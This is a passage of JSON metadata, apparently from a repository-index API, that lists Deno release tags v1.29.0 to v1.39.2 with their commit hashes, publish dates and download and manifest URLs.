"sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":